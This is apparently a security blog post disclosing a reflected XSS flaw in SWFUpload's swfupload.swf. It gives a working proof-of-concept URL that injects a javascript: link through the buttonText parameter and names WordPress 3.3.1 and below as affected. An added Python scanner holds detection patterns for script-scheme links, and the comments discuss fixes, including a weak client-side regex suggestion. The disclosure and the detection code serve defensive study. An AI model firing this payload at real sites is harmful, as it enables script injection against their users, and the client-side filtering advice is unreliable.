Hi,
Just want to share my finding:
I found another XSS vulnerability in swfupload.swf.
PoC:
http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E
Vulnerable Parameter:
buttonText
Vulnerable Code:
this.buttonTextField.htmlText = this.buttonText;
(For WordPress fans: works on version 3.3.1 and below)
Enjoy...
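For defenders, an added example (not part of the original post or of SWFUpload): a Python scan of web access logs for requests to swfupload.swf whose buttonText parameter carries markup, the pattern shown in the PoC above. The log format, the sample lines, the /static/ path, and the names classify and scan are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic); the last one carries the post's PoC query.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/May/2012:10:00:01 +0000] "GET /static/swfupload.swf HTTP/1.1" 200 12655',
    '198.51.100.7 - - [01/May/2012:10:00:02 +0000] "GET /static/swfupload.swf?buttonText=Select+Files HTTP/1.1" 200 12655',
    '198.51.100.9 - - [01/May/2012:10:03:10 +0000] "GET /static/swfupload.swf?buttonText=%3Cspan%20class%3D%22btn%22%3EUpload%3C%2Fspan%3E HTTP/1.1" 200 12655',
    '203.0.113.4 - - [01/May/2012:10:07:45 +0000] "GET /v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E HTTP/1.1" 200 12655',
]

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any HTML-like tag in the decoded parameter value.
TAG_RE = re.compile(r'<\s*/?\s*[a-z]', re.I)
# A link whose href uses a script-capable scheme.
SCRIPT_HREF_RE = re.compile(r'href\s*=\s*["\']?\s*(?:javascript|vbscript|data)\s*:', re.I)


def classify(value):
    """Return 'script-link', 'markup', or None for a decoded buttonText value."""
    if SCRIPT_HREF_RE.search(value):
        return "script-link"
    if TAG_RE.search(value):
        return "markup"
    return None


def scan(lines):
    """Return (line_no, client, verdict, decoded_value) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("swfupload.swf"):
            continue
        # parse_qs percent-decodes the value once, as the query string is decoded on delivery.
        for value in parse_qs(url.query, keep_blank_values=True).get("buttonText", []):
            verdict = classify(value)
            if verdict:
                findings.append((line_no, client, verdict, value))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `markup` hit may be ordinary button styling, since the field is rendered as HTML; a `script-link` hit matches the pattern in the PoC and deserves a closer look.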
3 comments:
Nice one!
How would you go about fixing this?
I don't see that AS3 provides a way to not render HTML in a textField. In AS2 there was a .html configuration boolean property, but it seems to have disappeared. I had hoped assigning to .text would do it, but no luck.
Use Regex (Client Side), Block malicious input,
For example:
<,>, etc...
:)